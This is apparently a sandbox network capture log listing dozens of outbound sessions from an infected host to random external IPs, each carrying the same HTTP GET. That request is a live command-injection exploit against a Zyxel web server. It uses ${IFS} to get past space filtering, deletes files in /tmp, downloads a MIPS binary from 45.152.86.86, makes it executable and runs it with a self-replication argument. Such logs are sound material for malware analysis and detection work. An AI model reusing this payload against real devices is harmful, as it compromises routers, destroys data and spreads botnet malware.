                              Mar 31, 2024 08:41:28.879626036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4678192.168.2.136087457.206.105.167443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.879692078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4679192.168.2.13331001.175.119.255443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.879710913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4680192.168.2.1348336144.193.110.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.879750013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4681192.168.2.1335788124.183.25.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.879796982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4682192.168.2.133690260.228.90.42443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.879847050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4683192.168.2.134744081.113.60.5443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.879878998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4684192.168.2.1345230207.168.207.160443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.879914045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4685192.168.2.1356292142.151.132.199443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.879987001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4686192.168.2.1342680148.75.104.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.880000114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4687192.168.2.1335946196.128.64.217443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.880033970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4688192.168.2.134484425.162.22.84443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.880078077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4689192.168.2.133848842.69.0.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.880115032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4690192.168.2.1335572206.161.18.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.880170107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4691192.168.2.133623893.247.187.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.880192995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4692192.168.2.135820246.176.245.5443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.880261898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4693192.168.2.1337112117.144.198.25443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.880286932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4694192.168.2.135963293.159.229.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.880317926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4695192.168.2.133848637.233.211.84443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.880363941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4696192.168.2.1341342220.111.232.168443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.880404949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4697192.168.2.1342068169.238.21.194443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.880435944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4698192.168.2.1349486115.124.124.172443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.880490065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4699192.168.2.1342750162.180.73.238443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.880520105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4700192.168.2.1359312168.255.150.33443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.880594969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4701192.168.2.1334046166.16.247.237443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.880597115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4702192.168.2.13361142.170.143.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.880647898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4703192.168.2.1355456219.120.231.132443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.880671024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4704192.168.2.134828247.3.2.193443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.880702019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4705192.168.2.1354782172.9.145.217443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.880757093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4706192.168.2.1356070122.28.123.69443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.880810022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4707192.168.2.1354784205.9.174.80443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.880856037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4708192.168.2.134715064.4.231.242443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.880906105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4709192.168.2.134278038.39.161.210443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.880945921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4710192.168.2.133445088.252.97.233443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.880964041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4711192.168.2.135668861.119.24.154443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.881006956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4712192.168.2.135239870.79.128.93443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.881061077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4713192.168.2.1338794120.192.166.255443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.881122112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4714192.168.2.1359476200.174.35.190443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.881124020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4715192.168.2.1337776161.210.131.103443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.881155014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4716192.168.2.1354868135.176.220.20443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.881203890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4717192.168.2.1349196146.43.111.96443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.881256104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4718192.168.2.134048082.80.147.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.881299019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4719192.168.2.13337009.73.151.130443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.881342888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4720192.168.2.135826059.212.135.203443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.881405115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4721192.168.2.1353672190.174.38.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.881441116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4722192.168.2.13466665.235.182.73443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.881460905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4723192.168.2.1340662217.39.149.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.881516933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4724192.168.2.1342120150.245.239.178443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.881541014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4725192.168.2.1343460211.24.45.8443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.881575108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4726192.168.2.133483049.77.227.149443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.881628036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4727192.168.2.135873262.208.96.119443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.881644964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4728192.168.2.1338480125.29.90.40443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.881694078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4729192.168.2.1359894187.29.192.184443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.881742954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4730192.168.2.1350858173.80.235.145443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.881778955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4731192.168.2.134996854.147.189.255443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.881818056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4732192.168.2.133995447.165.104.166443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.881875038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4733192.168.2.1345516213.239.197.189443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.881906986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4734192.168.2.1356780138.73.98.13443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.881972075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4735192.168.2.1346074200.46.218.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.882019997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4736192.168.2.1355544211.83.85.150443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.882049084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4737192.168.2.13439288.20.238.196443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.882096052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4738192.168.2.1352612173.153.107.235443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.882129908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4739192.168.2.133551431.135.194.214443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.882164001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4740192.168.2.1347848186.4.42.203443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.882194996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4741192.168.2.135131412.249.246.47443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.882234097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4742192.168.2.1341244176.139.209.178443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.882288933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4743192.168.2.1335396171.43.59.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.882330894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4744192.168.2.1360560130.44.205.133443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.882379055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4745192.168.2.134116050.164.167.235443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.882400990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4746192.168.2.133850294.121.132.50443
                              TimestampBytes transferredDirectionData
